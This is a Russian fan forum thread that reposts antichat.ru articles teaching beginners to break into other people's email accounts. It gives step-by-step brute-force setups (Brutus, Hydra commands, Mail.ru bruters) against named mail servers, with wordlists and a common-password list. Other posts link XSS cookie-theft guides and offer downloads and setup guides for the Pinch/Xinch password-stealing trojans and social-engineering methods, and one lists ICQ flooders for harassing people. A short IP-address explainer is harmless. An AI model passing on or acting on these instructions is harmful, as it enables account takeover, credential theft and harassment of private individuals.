Cюда вставляем нашу таблицу

Горизонт событий

Объявление

"Вселенная огромна,
и это ее свойство чрезвычайно действует на нервы, вследствие чего большинство людей, храня свой душевный покой, предпочитают не помнить о ее масштабах."


© Дуглас Адамс

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Горизонт событий » Архив тем » Введение в Интернет и безопасность в нем


Введение в Интернет и безопасность в нем

Сообщений 1 страница 30 из 46

1

Статья с форума http://forum.antichat.ru/
За ашипки и очепятки в статьях ответственности не несу.

Взлом e-mail

ЧАСТЬ 1.

"Intro"

Приветствую каждого кто читает эту статью. От кульного кулхацкера и до тех кто хочет им стать. Статья написана с целью помочь ньюбесам разобраться в принципах взлома почтовых ящиков как с помощью спец. софта созданного для этих целей, так и с помощью "мозгов" так сказать.
В данной статье будут рассмотрены не только принципы взлома почтовиков, но и так же будет отчасти выложен софт необходимый для этого и соответственно линки на видео, которое есть на нашем любимом античате. Так же будет выложен список ЧАВО и пути их решения.
(Все это в конце статьи)
В целом статья ориентирована на то, чтобы у новичков в этом деле не возникало больше вопросов типа "Как взломать мыльник на мэйл.сру?", ибо достали вы уже народ с этими вопросами, поэтому вам и говорят в ваших топиках, что мол тема заезжена и все такое, что приводит к тем ответам на ваши вопросы, которых вы не ожидаете.
Постарайтесь максимально впитать весь материал, который изложен ниже и не задавать глупых вопросов.
Пытайтесь сами решать свои вопросы в плане взлома ибо ][акер есть самоучка.
Итак, приступим.
Существует достаточно много способов взлома почтовых ящиков в не зависимости от того на каком домене они распологаются.
От простого нудного брута до кражи Cookie. Рассмотрим каждый из них подробно.

НАМБА_1(1): Брут.
Брут-это достаточно долгий процесс взлома, если смотреть со стороны. Так сказать, лобовая атака. При этом время, которое можно потратить на взлом этим способом напрямую зависит от чела, которого ты ломаешь. Будь то ламер или вумный юзверь, либо ][ацкер.
Поскольку от образованности чела в этом деле зависит длинна и сложность пассворда, который он поставит себе на почтовик.
Углубимся в этот метод взлома и рассмотрим соответствующий софт, необходимый для этого.
Первой и наиболее распространенной прогой для взлома почтовиков является BrutusAET2.

Нам потребуется:

1) Программа для переборки паролей BrutusAET2 , которую можно скачать отсюда:
http://rapidshare.de/files/35508241/BrutusAET2.rar.html

2) Словарики ,которые можно взять отсюда:
http://www.passwords.ru/dic.php
http://www.insidepro.com/eng/download.shtml
http://www.outpost9.com/files/WordLists.html
http://www.acolytez.com/dict/
http://www.phreak.com/html/wordlists.shtml
http://www.mobilstar.ru/files/dict/

3) Прямые руки.

К примеру приведу угон мыльника на @yandex.ru.

Настройка программы для переборки паролей BrutusAET2:

1) Открыли программу.
2) В поле Target пишем pop.yandex.ru
3) В поле Type выбираем POP3

Connection Options:

1) Port ставим 110.
2) Connections ставим на максимум т.е 60.
3) Timeout ставим на максимум т.е 60

POP3 options:
Не трогаем, это для хакеров =)

Authentication options:

Если мы хотим брутить список мыльников, тогда нам надо создать текстовик, назовём его users.txt ,туда значит закидываем списки юзеров.
Например:
Vasja_pupkin
Abcdefgh
Abcabc

Лезем в прогу там ставим галочку около Username.

Use Username: указываем путь к списку юзеров.

Переходим к списку паролей…
Создаем значит текстовик words.txt и туда пихаем пароли.
Например:
Password
Pass
123

Лезем в прогу и выбираем

Pass mode : Word list
Pass file : указываем путь к списку паролей.

Если @mail.ru просто ставим в Target : pop.mail.ru и остальное всё тоже самое.

Если @bk.ru просто ставим в Target : pop.bk.ru и остальное всё тоже самое.

Если @list.ru просто ставим в Target : pop.list.ru и остальное всё тоже самое.

Если @inbox.ru просто ставим в Target : pop.inbox.ru и остальное всё тоже самое.

по примерам можно сделать вывод,что если мыло на зоне ааа.ru значит и POP сервер будет pop.ааа.ru
Вобщем всё должно получится как на скриншоте :

[реклама вместо картинки]

После всего этого Нажимаем Start и Брут пошёл.

Скачать: http://www.securitylab.ru/

Программулька достаточно давно живет в инете и получила признание у многих взломщиков. ОДнако в нынешнее время наблюдаются небольшие глюки у этой проги. Например, бывает так, что в процессе брута, если пасс будет стоять в конце (200 место в словаре к примеру), то она может пропустить этот пасс.
Линчо у меня бывало так, что она находила пассворд тока со второго круга а первый раз пропускала. ОДним словом, прога хорошая, многофункциональная. Способная брутить мыльники не зависимо от того, на каком домене распологается почтовик. ОДнако для нее важное значение играет расположение правильного пассворда в словаре.
А именно, его позиция среди других слов. Чем оно ближе, тем для вас же лучше. И это касается не только именно этой проги, но и также остальных. Так что, прежде чем исользовать её, пораскиньте мозгами какие ключевые слова задать перед генерацией словаря.

Для генерации словаря хорошо подойдет PassWordsPro. Программа кульная, предназначенная не только для генерации слов, но и так же для генерации хешей. Таких как md4, md5, MSCash, Sha-1, MySQL....
ПОлностью описывать все ее функции не буду. Сами разберетесь, когда придет время для расшифровки хешей. Да и объяснение принципов расшифровки и генерации хешей не относится к этой теме.

Скачать: http://www.insidepro.com/download/passwordspro.zip

Если вышеизложеной информации вам не достаточно по использование Brutus AET2, то вот урл на видео:

Скачать: http://video.antichat.ru/download_109.html

НАМБА_1(2): Mail_ru_brut_by_Zlo_v3.0.

Скачать: http://www.xakbios.net/
Эта прога даже легче Brutus, если сравнивать их две. КОРоче, постараюсь обьяснить все по пальцам. Тут даже никакого ФАКА не понадобиться. КОроче, значит так. Софтвина эта начинает работать тока когда заходишь на пагу самого Зло.
Ну, точнее вместе с запуском проги запускается пага разработчика. И ни что с этим не поделаешь, уж так наверное захотелось её создателю, чтобы больше народу заходило на его портал. Ну да ладно, ближе к телу. Поле Mail;Pass. Тут ничего менять не стоит. Просто создаешь на системом логическом разделе своего харда текстовичок с названием unr.txt.
Кидаешь туда "куцэ" сгенереные тобой мыльники в таком виде:

Vasya_Pupkin@mail.ru;qwerty.
Vasya_Pupkin@mail.ru;askjdh
Vasya_Pupkin@mail.ru;sakajshds

Ну где тут мейлер а где пасс думаю видно. В поле Save Good а именно в текстовичке ssafsa.txt, который ты должен тож создать на С:/> будут сэйвиться набрученные в процессе взлома пассы на почтовик(и).
Поля Theards и ТimeOut лучше оставь по дэфолту.

1)Position - показывает позицию пасса на котором остановился брут, если сделана пауза.
2) Ну и есессно ты мож брутить ч-з проксю.
Поле Theards соответственно (3), показывает число и скорость потоков в процессе брута.

Да и еще заранее оговорюсь. КАк правило, на паге Zlo предлагается купить не бажную версию данной софтвины с возможностью халявного апдейта. КОнечно можно купить, т.к некоторые версии этой проги не воспринимают русскоязычные слова в процессе брута.
Но вопрос покупки уже стоит перед вами. Если ты сынка банкира, то мож купить. Но думаю даже и таким охота халявы)))
Это мануал подробней некуда....

К вашему сожалению (а может и без сожаления) видео по использованию данной проги нет.
Но а если глянуть со стороны, что тут сложного. И без видео думаю справиться можно.

Софт с помощью которого можно сгенерить брут-лист наз-ся UIN Generator.
Так же, с помощью данной софтвинки можно сгенерить и листы пассов для брута асек.
Но это уже другая тема.
Скачать: http://www.proxy-forum.org/files/ic...n/generator.rar

В поле номер (Один уин) вписываем мыло жертвы. В поле (Пароль), расположенное ниже отмечаем галочку на "словарь" и задаем путь к словарю, который вы хотите использовать для брута мыльника.
После всего этого нажимаем генерировать (на поле "Один номер") и пойдет процесс составления брут-листа.

Так, поехали дальше.

НАМБА_1(3): Duk3NN Mail Bruter 3.03 F I N A L edition.

В принципе, программулька не плохая. Может кто ее юзал чаще меня возразит. Но это его право и осуждать его и уж падавно спорить с ним не буду. Ибо каждый при своем мнении.
Познакомимся с ней поближе.

Скачать: http://jerimi-3434.narod.ru/mb303final.rar

Здесь есть несколько вкладок. На вкладке Process отображается непосредственно сам процесс брута.
Число потоков, используемых проксиков,лог брута и др. На этой вкладке и осуществляется запуск процесса брута.

Следующая вкладка Brute Options. Тут задаются параметры для брута.
Тут можно брутить как с загрузкой mail;pass листа как в Mail.ruBrute, так и задав домен на котором находится почтовик жертвы.
Отличием этой проги то двух представленных выше является то, что тут можно загрузить лист прокси а не менять его в ручную каждый раз, когда это необходимо как, например в Mail.ruBrute. Не говоря уже о Brutus, которая работает вообще тока через Socks v4, v5.

@Mail.ru брутфорс.

===========================================
Описание файла настроек
-----------------------
[Item <порядковый номер>]
Title=<Название>
Host=<Хост>
Req=<Запрос (строчки в заросе разделяются знаком # Например: Req=POST mailserver.com HTTP/1.0#Referer: mailserver.com>
Data=<Информация отправляемая серверу>
Bytes=<Кол-во принимаемых байт>
Good=<Признак нужного ответа>

%login% - Заменяется на имя пользоавтеля
%pass% - Заменяется на пароль

%login% И %pass% могут быть в Req и Data одновременно.

НАМБА_1(4): Nextmail.ru Bruteforce.

Брутфорс для подбора паролей к почтовым ящикам на nextmail.ru включая поддомены:

nextmail.ru
nxt.ru
email.su
russian.ru
xaker.ru
students.ru
mail2k.ru
dezigner.ru
programist.ru

Скачать: http://www.xicq.org/pub/icq/brutefo..._bruteforce.rar

Программулька проста в освоении. И не освоить ее может тока самый последний ламер. Поля Theards, Remains и Processed мы рассматиривать не будем. В этом нет надобности, потому что значение этих полей такое же как и в Mail.ru Brute.
Рассмотрим поля ниже. Хотя они такие же как в Mail.ru Brute, но коль уж я сказал про них, то приступим. Поле Inlist. Тут задается путь к брут-листу, который будет в виде блаблабла@nextmail.ru;мухосранск.
Гинерить его думаю догадываетесь чем. (Пасс-лист)

Поле Good. Тут задается путь к тестовичку в который будут скидываться правильно набрученные пароли.
Theards: потоки (соответственно)
Autosave: порядок сохранения работы в процессе брута.

После задания всех настроек жмем OK и start. И пляшем с музыкой и бубнами, чтобы брут оказался удачным.

НАМБА_1(5): Yandex Mail Bruteforcer.

Программулька достаточно примитивна, поэтому не вижу надобности описывать че куда записывать.

Скачать: [хз - пробивайте по Гуглу. *примеч. Kestrel]

НАМБА_1(6): Hotmail bruteforce.

Прога, которая хорошо чебя зарекомендовала во взломе почтовиков всем известного домена Hotmail.
Ну, описывать ее я не буду, потому что принцип действия у неё такой же, как и у таких прог этого семейства (Nextmail bruteforce и др.)

Скачать: http://jerimi-3434.narod.ru/hotmail.rar

НАМБА_1(7): Earthlink.net bruteforce.

Программа для перебора паролей на знаменитом почтовом сервисе earthlink.net, включая все его поддомены.
Если мыло давно не использовалось, то оно замораживается, и если у вас не получается зайти в почту, используя сбрученный логин и пасс, то этот аккаунт скорее заблокирован, чем программа дала сбой.
Проверить емейл на пригодность можно тут:
(https://myaccount.earthlink.net/cam/tra … &add=1)
Принцип работы такой же, как и у вышепредставленной проги.

Скачать: http://lifar.com.ru/content/uploads/erth.rar

НАМБА_1(8): Hydra.

Сразу оговорюсь для новичков. Чтобы юзать эту прогу для взлома мыльников нужно иметь шелл. ЧТо такое шелл и с чем его едят думаю вас известно. Но если нет, то вот вам небольшой манульчик:

Shell-аккаунт - что это?
Тык!

Hydra в основном используется для взлома, когда имеется шелл. Чтобы заиметь шелл, нужно похатчить
сервант. Как вы будете это делать это уже ваша забота. К тому же описание получения шелла будет
выходить за рамки этой статьи.

Как правило она используется и работает под Linux или Unix. Одним словом на любой никсовой ОС.

Версия для Unix'a/Linux'a.

Скачать: http://thc.org/download.php?t=r&f=h … src.tar.gz
Сорцы: http://jerimi-3434.narod.ru/hydra-5.3-src.tar.gz

Но так же есть и версия под форточки (Win). Такую версию хорошо юзать, если имеешь бычью скорость инета.

Версия для Windows.

Скачать: http://video.antichat.ru/download_110.html

Как заливать на шелл Гидру, ньюбесам думаю будет интересно. Поэтому я выложу последовательность заливки на шелл. Хотя описание где-то было на ачате. Ну да ладно, принцип один.

Сначала стянем архив.
wget http://thc.org/download.php?t=r&f=h … src.tar.gz
Распаковываем
gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar
или
tar -xzf hydra-4.7-src.tar.gz
И ставим
cd hydra-4.7-src
./configure
make
make install
можно копирнуть назад и удалить исходники
cp hydra ..
cd ..
rm -rf hydra-4.7-src
Работаем
./hydra (для справки)
./hydra -l lamer -P pass.txt -w 20 -t 10 pop.server pop3
для подбора пароля из словаря pass.txt к логину lamer
на сервере pop.server, timeout=20 sec, потоков 10.

================================================== ==============

Приведу список наиболее часто используемых паролей для почтовиков:

12345 0000
123456 000000
1234567 111
12345678 1111
123456789 11111
1234567890 11111
0987654321 111111
1029384756 123
192837465 123123
11111 123321
123123 1234
666999 12345
999666 123456
qwerty 1234567
admin 123654
adminpass 4444
qweqwe 555
qweqweqwe 55555
asdf 555555
asdfg 654321
pass 666
password 666666
parol 666999
hack 777
hacker 7777
hackme 777777
keyboard 7777777
access

========================================

Тут можно скачать словари для брута.

Скачать:

1) http://advlamer.narod.ru/brute.htm
2) http://advlamer.narod.ru/dict/advlamer-digits.rar
3) http://www.hackersplayground.org/wordlists.html
4) http://passcrack.spb.ru/modules/Fil...c/passcrack.rar
5) http://advlamer.narod.ru/dict/advlamer-digits.rar
6) http://freeware32.ru/index.php?program= … onary_Tool
7) http://www.passwords.ru/dic.php
8) ftp://ftp.cerias.purdue.edu/pub/dict/

to be continued...

+1

2

Статья с форума http://forum.antichat.ru/
За ашипки и очепятки в статьях ответственности не несу.

Взлом e-mail

ЧАСТЬ 2.

НАМБА_2(1): XSS.

Что такое XSS я в этой статье подробно расписывать не буду по причине того, что материала на эту тематику предостаточно на античате. Здесь большей частью будут собраны линки на статьи, топики и видео, где рассмотрены основные принципы эксплуатации этой и других узвимостей почтовых служб.

Ну, ближе к телу.
++++++++++++++++++++++++++++++++++

Видео

XSS на mail.ru.
Скачать: http://video.antichat.ru/file213.html

XSS на hotmail.com.
Скачать: http://video.antichat.ru/file213.html

Уязвимости почтовой службы yahoo.com.
Скачать: http://video.antichat.ru/file181.html

Уязвимости почтовой службы mail.ru.
Скачать: http://video.antichat.ru/file180.html

XSS на zhuki.mail.ru.
Скачать: http://video.antichat.ru/file172.html

Взлом ящика на nm.ru.
Скачать: http://video.antichat.ru/download_52.html

Взлом ящика на e-mail.ru.
Скачать: http://video.antichat.ru/download_51.html

Как получить чужие письма на рамблере.
Скачать: http://video.antichat.ru/download_113.html

Перехват сессии на сервере pochta.ru.
Скачать: http://video.antichat.ru/download_8.html

XSS на почте Yandex.Ru
Скачать: http://video.antichat.ru/download_4.html

++++++++++++++++++++++++++++++++++++++++

Статьи

Активная XSS на mail.ru
http://forum.antichat.ru/thread11318.html

Активная XSS на http://pochta.ru/
http://forum.antichat.ru/thread28645.html

XSS mail.ru rambler.ru
http://forum.antichat.ru/thread28497.html

Xss для новичков
http://forum.antichat.ru/thread20140.html

XSS, SQL-inj, PHP-inj и др. на примере phpBB
http://forum.antichat.ru/thread20191.html

Пачка пассивных XSS на neora.com
http://forum.antichat.ru/thread21437.html

XSS + Feik
http://forum.antichat.ru/thread27344.html

Зачем Cookie нужен
http://antichat.ru/txt/old/cookie.shtml

ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ
http://antichat.ru/txt/hmail/

CGI-сниффер
http://antichat.ru/sniff/

Подборка сайтов по CSS, XML технологиям и Web2.0 решениям
http://forum.antichat.ru/thread18709.html

При помощи XSS кража cookies - Или новички сюда.
http://forum.antichat.ru/thread25933.html

Баги на Почте.ру
http://forum.antichat.ru/thread24000.html

Проводим XSS без javascript
http://forum.antichat.ru/thread13949.html

Реализация XSS на rambler.ru
http://forum.antichat.ru/thread24130.html

Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
http://forum.antichat.ru/thread5423.html

XSS крупным планом.
http://forum.antichat.ru/thread11807.html

XSS на wwwpochta.ru
http://forum.antichat.ru/thread12124.html

Захват ящика на e-mail.ru
http://forum.antichat.ru/thread5556.html

Захват ящика на pochta.ru
http://forum.antichat.ru/thread5899.html

В целом, прочитав весь этот материал и просмотрев видео уже и так думаю все будет понятно где и как эксплуатировать эти уязвимости.

================================================== ===================
ЧАСТЬ 3.

НАМБА_3(1): Трои.

Я думаю перед каждым из нас, когда приходит нужна взломать чей-нить мыльник встает вопрос. Как ломать? Некоторые подумают сразу-Трой. И подумают правильно. Ибо нет проще метода кинуть троя жертве и получить заветные пассы на мыльник или аську.
Не буду рассказывать про то, как настраивать трои для их функциональности. За меня это сделали раньше.
Но все же приведу линки по которым можно будет скачать троя по вашему вкусу.

============================

Xinch v_1.5
Скачать: http://www.zm-team.h17.ru/Files/pinch-xinch/Xinch.rar

Pinch 2.58
Скачать: http://narod.yandex.ru/100.xhtml?zm.../pinch_2.58.rar

Pinch 2.59
Скачать: http://forum.antichat.ru/thread28335.html

Pinch 1.0
Скачать: http://jerimi-3434.narod.ru/pinch1.0.rar

+++++++++++++++++++++++++++++++

Видео.

Конфигурирование и использование трояна Xinch.
http://video.antichat.ru/file174.html

Рассказ о трояне Пинч 1.0
http://video.antichat.ru/file85.html

+++++++++++++++++++++++++++++++

Статьи.

Троянизация на коленке.
http://forum.antichat.ru/thread14498-Xinch.html

Хинч по хттп - для новичков.
http://forum.antichat.ru/thread21767-Xinch.html

Настройка троянов Xinch/Pinch. Все вопросы по пинчу только в этом теме!
http://forum.antichat.ru/thread19273.html

Инструкция по Pinch 1.0
http://forum.antichat.ru/thread24564.html

================================================== ========================
ЧАСТЬ 4.

НАМБА_4(1): СИ (СОЦ. ИНЖЕНЕРИЯ)

Статьи.

Седьмая нота. СИ и её практическое применение.
http://forum.antichat.ru/thread25546.html

КАК ПИСАТЬ ПИСЬМА> В ПОМОЩЬ СОЦИАЛЬНОМУ ИНЖЕНЕРУ
http://forum.antichat.ru/thread10865.html

СИ + Pinch (для новичков)
http://forum.antichat.ru/thread14387.html

Методы СИ
http://forum.antichat.ru/thread19659.html

Как узнать пароль (СИ)
http://forum.antichat.ru/thread16545.html

Ещё раз о СИ
http://forum.antichat.ru/thread15052.html

Как узнать код доступа (СИ)
http://forum.antichat.ru/thread14653.html

Как получить пароли(СИ)
http://forum.antichat.ru/thread8171.html

================================================== ===
ЧАСТЬ 5.

НАМБА_5(1): "ЧАВО".

КАк правило, даже при уже разжеваных по самое не хочу методов взлома почтовиков, у ньюбесов возникают различные вопросы типа "У меня не получается то-то или это, помогите". Не знаю с чем бы это может быть связано. Но думаю у каждого из нас, кто только-только начинал и вступал на тропу человека, который за свободу информаци, возникало множество вопросов. Кто-то решал их сам а кто-то просил помощи у ближнего, который знал (знает) как решить тот или иной вопрос.
Смотрю философией начинает попахивать. Перейдем сразу к делу.

Ниже будет приведен список ЧАВО (список часто задаваемых вопросов (Это касается новичков.
Привыкаете к соответствующим названиям)). И соответственно, пути их решения.
Расписывать сами вопросы и ответы на них я не стал. Но чтобы вы "НОВИЧКИ" не задавали один и тот же вопрос по несколько раз участникам форума, которым думаю уже начинают сниться вопросы "КАк взломать мыло?" или "КАК настроить троян?" так же, как и мне. Вот вам список ЧАВО.

нужны прокси для брута мыла!?
http://forum.antichat.ru/thread27186.html

DukeNN Mail Bruter 3.03
http://forum.antichat.ru/thread26810.html

Проблемка с Брутом
http://forum.antichat.ru/thread26383.html

Обясните
http://forum.antichat.ru/thread26164.html

Есть проблема с брутусом...насчет прокси...
http://forum.antichat.ru/thread26230.html

Не понимаю с Brutus!
http://forum.antichat.ru/thread26184.html

Ну вот пожалуй и все. Все методы взлома почтовиков, которые являются наиболее часто используемы, рассмотрены.
В этой статье все разжевано. Осталось только положить все в рот и дать по кадыку, чтобы все это провалилось внутрь и у вас "НОВИЧКОВ" не возникало больше подобных вопросов.

И да прибудет с вами root.

0

3

Значит так, товарищи ШурСтраКосы, две статьи выше - это было творческое вступление, авторские тренировки речи, а теперь я серьезно объясню смысл данного топика. Итак, каждый ШурСтраКос по определению крутой, как Аль-Асвад. НО! Крутость ШурСтраКоса измеряется по трем уровням:
1. Уровень физической силы.
2. Уровень интеллекта (сюда входят не только знания, получаемые вами в вузах, или умение правильно взорвать планету, но еще и уровень компьютерной образованности).
3. Внешние данные =)
4. Уникальная особенность (у каждого шурСтраКоса обязательно есть своя "изюминка", которая делает его уникальным).
Поговорим конкретно о втором пункте.
Каждый, несомненно, считает себя самым умным. Каждый ШурСтраКос должен не только хорошо учиться в школе/универе =), но еще и быть в теме его "профессиональных" тем. В нашем случае это темы научной фантастики. Но какая же наука и космотехнологии могут быть без универсального изобретения манчкинов Вселенной - компьютеров? Компьютерная образованность - важнейшая составляющая крутости ШурСтраКоса. А теперь представьте себе Дарта Вейдера, который не умеет ломать Мэйл.Ру (Голонет.Ру). Представили?
Ну какой же ШурСтраКос может быть суперкрутым, если он ничего не смыслит в веб-хакинге? Теперь у всех ШурСтраКосов есть уникальный шанс повысить уровень свой мегакрутости, ознакомившись со статьями юзеров Античата.
В эту тему будут выкладываться самые интересные и наиболее полезные статьи. Удачи вам в повышении уровня компьютерной грамотности! =)

0

4

Итак, поехали! Вышеописанные способы взлома почтовых ящиков - это вам для тренировки). А теперь приступим к теории.

IP-адрес

Автор статьи - хз кто.

IP-адрес  (aй-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной сети или интернету.

IP-адрес представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4) является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса).

IP-адреса представляют собой основной тип адресов, на основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов.

IP-адрес состоит из двух частей: номера сети и номера узла. В случае изолированной сети её адрес может быть выбран администратором из специально зарезервированных для таких сетей блоков адресов (192.168.0.0/16, 172.16.0.0/12 или 10.0.0.0/. Если же сеть должна работать как составная часть Интернета, то адрес сети выдаётся провайдером либо pегиональным интернет-регистратором (Regional Internet Registry, RIR). Всего существует пять RIR: ARIN, обслуживающий Северную Америку; APNIC, обслуживающий страны Юго-Восточной Азии; AfriNIC, обслуживающий страны Африки; LACNIC, обслуживающий страны Южной Америки и бассейна Карибского моря; и RIPE NCC, обслуживающий Европу, Центральную Азию, Ближний Восток. Региональные регистраторы получают номера автономных систем и большие блоки адресов у ICANN, а затем выдают номера автономных систем и блоки адресов меньшего размера локальным интернет-регистраторам (Local Internet Registries, LIR), обычно являющихся крупными провайдерами.

Номер узла в протоколе IP назначается независимо от локального адреса узла. Маршрутизатор по определению входит сразу в несколько сетей. Поэтому каждый порт маршрутизатора имеет собственный IP-адрес. Конечный узел также может входить в несколько IP-сетей. В этом случае компьютер должен иметь несколько IP-адресов, по числу сетевых связей. Таким образом, IP-адрес характеризует не отдельный компьютер или маршрутизатор, а одно сетевое соединение.

Классы IP-адресов

Какая часть адреса относится к номеру сети, а какая — к номеру узла, определяется значениями первых бит адреса. Значения этих бит являются также признаками того, к какому классу относится тот или иной IP-адрес.

Бесклассовая адресация
Со второй половины 90-х годов XX века классовая адресация повсеместно вытеснена бесклассовой адресацией, при которой количество адресов в сети определяется только и исключительно маской подсети.

Особые IP-адреса
В протоколе IP существует несколько соглашений об особой интерпретации IP-адресов:

eсли весь IP-адрес состоит только из двоичных нулей, то он обозначает адрес того узла, который сгенерировал этот пакет; этот режим используется только в некоторых сообщениях ICMP;
eсли в поле номера сети стоят только нули, то по умолчанию считается, что узел назначения принадлежит той же самой сети, что и узел, который отправил пакет;
eсли все двоичные разряды IP-адреса равны 1, то пакет с таким адресом назначения должен рассылаться всем узлам, находящимся в той же сети, что и источник этого пакета. Такая рассылка называется ограниченным широковещательным сообщением (limited broadcast);
eсли в поле номера узла назначения стоят только единицы, то пакет, имеющий такой адрес, рассылается всем узлам сети с заданным номером сети. Например, в сети 192.190.21.0 с маской 255.255.255.0 пакет с адресом 192.190.21.255 доставляется всем узлам этой сети. Такая рассылка называется широковещательным сообщением (broadcast).

Динамические IP-адреса
IP-адрес называют динамическим, если он назначается автоматически при подключении устройства к сети и используется в течение ограниченного промежутка времени, как правило, до завершения сеанса подключения.

Для получения IP-адреса клиент может использовать один из следующих протоколов:

DHCP (RFC 2131) — наиболее распространённый протокол настройки сетевых параметров.
BOOTP (RFC 951) — простой протокол настройки сетевого адреса, обычно используется для бездисковых станций.
IPCP (RFC 1332) в рамках протокола PPP (RFC 1661).
Zeroconf (RFC 3927) — протокол настройки сетевого адреса, определения имени, поиск служб.

Инструменты
Под ОС Windows свой IP-адрес можно узнать, набрав ipconfig в командной строке.
Под ОС Unix свой IP-адрес можно узнать, набрав ifconfig в командной строке.

0

5

Flood - spam ICQ
(посвящается Ревану)
:D

ICQFlooder by l-l00k

Программа служит для флуда icq-номера недруга, работает без проксей. Больше 70 номеров лучше не загружать, иначе, когда все номера онлайн, будут сильные тормоза. Номера должны быть в формате uin;pass.

Добавлено:

    * Сделано 2 режима флуд-атаки.
    * All - режим, в котором раньше работал флудер, то есть шлет по сообщению от каждого активного номера, затем отдыхает таймаут, потом опять шлет.
    * One - режим, в котором флудер шлет одно сообщение, ждет таймаут, шлет еще одно сообщений и т.д.
    * Время теперь указывается в милисекундах.
    * Добавлена возможность обхода защиты от спама, достаточно поставить галочку на "Spam protection" и указать ответ на защитный вопрос, затем нажать на "Send"; каждый из номерков обойдет защиту, и после этого уже пойдет флуд.
    * Флудер теперь определяет номера с неправильными паролями (BAD).

Скачать:
http://depositfiles.com/ru/files/x6a7eo2rj

ICQ flooder FBK3.0 private

    * успешно грузит до 1000 номеров.
    * отображает, что пишут на номера флуда (обычно там: "Аааа! Перестаньте!...").
    * показывает, сколько сообщений точно получит жертва.
    * отсеивает сдохшие потоки.
    * показывает, сколько сообщений в секунду получает жертва.
    * регулируемая скорость загрузки номеров и скорость отправки сообщений.
    * отправляет текстовое сообщение.
    * отправляет шум (случайный набор байтов) указанной длины.
    * отправляет по строчке из текстового файла.
    * хорошор мучает пользователей QIP, если грузануть более сотни номеров и выставить интервал отправки 2000.
    * Написан с нуля на Visual Basic.
    * 50 номеров для флуда в комплекте (по желанию).
    * QIP валит!

Скачать:
http://depositfiles.com/ru/files/vof91e4sl

[Perl] Fl00d icq by C!klodoL

Флудер icq, реализованный на Perl-e.

Скачать:
http://depositfiles.com/ru/files/8s8ssrs16

ICQ flooder 0.6 Private

[Возможности]:

    * Флудер ICQ интернет-пейджеров.
    * Работает шоколадно...
    * Возможно поставить время перерыва между сообщениями.
    * Возможность выбора сообщений - авторизация, простые сообщения и сообщения вида "Вас добавили" !!!

Скачать:

http://depositfiles.com/ru/files/vg22rvp6l

.B. Flooder version 0.2 (beta)

Возможности:

    * Messege type.
    * Сообщение.
    * Авторизация.
    * "Вас добавили".
    * В авторизации отказано.

Files:
Загрузка из *.txt файлов:

    * uin;pass.
    * text.

Счетчик:

    * Отосланных сообщений.
    * Принятых сообщений.
    * Загруженных номеров.

Трей:

    * Сворачивание в трей.

Connect options:

    * Настройки подключения.
    * Flood options.
    * Connect pause.
    * Send pause.
    * Super flood.

Скачать:
http://depositfiles.com/ru/files/u0cmhsv3b

IMtale 4.1.2

Представляет из себя программу для рассылки сообщений по номерам icq. Программа работает на самом последнем протоколе icq. Отличительная особенность программы - простота в использовании и максимальная автоматизация рутинных задач рассылки по номерам icq. Программа сочетает в себе простоту и оптимальность. Вам не нужно ломать голову по поводу того, как можно найти больше пользователей, какие дополнительные параметры поиска указывать, а какие нет, как избежать различных серверных лимитов на отправку и поиск. Интеллектуальный алгоритм программы сам все предусматривает. Программа поддерживает русский и английский языки.

Скачать:
http://depositfiles.com/ru/files/ra0o0eitq

OSCAR Flooder

Поддерживает:
Отправку сообщений на...

    * Один номер.
    * Список.
    * Диапазон номеров.

Типы сообщений:

    * Обычное.
    * Запрос авторизации.
    * Отказ авторизации.
    * Одобрение авторизации.
    * url-сообщение.
    * "Вы добавлены".

Скачать:
http://depositfiles.com/ru/files/4l6fubk91

Flisis-flooder.v2.8.1.with-proxy

То же самое, что и выше, но только с проксями.

Скачать:
http://rapidshare.com/files/28951623/Fl … -proxy.rar

Kyle Katarn Flooder

Удобный и простой флудер/спамер, не требующий заливки на хост!
К сожалению, не может похвастаться тысячами сообщений в секунду, но потрепать нервы зафлуженному ламеру или устроить спам-рассылку по диапазону номеров позволит.

Скачать:
http://www.rapidshare.ru/926296

0

6

А спамить пустотой умеет?

0

7

Энвич, "пустотой" спамить тоже можно - просто забей в текстовое сообщение кучу пробелов и копипасти "пустоту", пока не надоест.

0

8

ЧаВо для тех, кто решил стать кулхацкером :D

С чего начать.

Я ничего не знаю, но хочу стать хакером. С чего начать?

Поверь, хочешь жить спокойно - лучше не начинать…

Но я все-таки очень хочу, что же делать?

Ну что ж, тогда стоит начать с того, что не задавать этот вопрос на форумах хацкерских сайтов.

Сперва определимся, кто такой хакер - это существо, у которого есть компьютер (ну это обязательно), две руки (одна для мышки, другая, конечно же, для пива/колы [Рэнд, не две руки для пива, а одна!]), голова (для наушников), и холодильник (ну пиво же не теплым пить!). Если у тебя все это есть, значит, у тебя есть все шансы стать настоящим хакером ;) Ах да, чуть не забыла, еще у хакера должен быть нестандартный образ мышления!

Зачем хакеру нестандартный образ мышления?

Все очень просто. Хакер на «ты» с компьютером и с Интернетом, а значит, не нуждается ни в чьей помощи – всю информацию он умеет находить в поисковых ресурсах. Если ты усвоишь эту простую истину, то сможешь быстро добиться успехов. Поверь, базы yandex.ru и google.ru содержат ответы на 90% вопросов, так что если не хочешь ждать несколько дней ответа, используй это преимущество. В этом и есть их «маленький секрет», откуда они так много знают. И вообще не бойся быть оригинальным!

Эх.. а я такой ламер, что даже поисковиками пользоваться не умею.

Стоп. Ламер – только тот, кто ничего не делает. Помнишь про 90%? Никогда не забывай эту цифру. Заходим на yandex.ru, вводим запрос «Поиск информации с помощью поисковиков» и вуаля! – попадаем на страницу http://www.poiskinfo.net/stat/st1.php, где все подробно описано, как искать и где. Читай, и через 15 минут будешь специалистом по поиску в Сети. :)
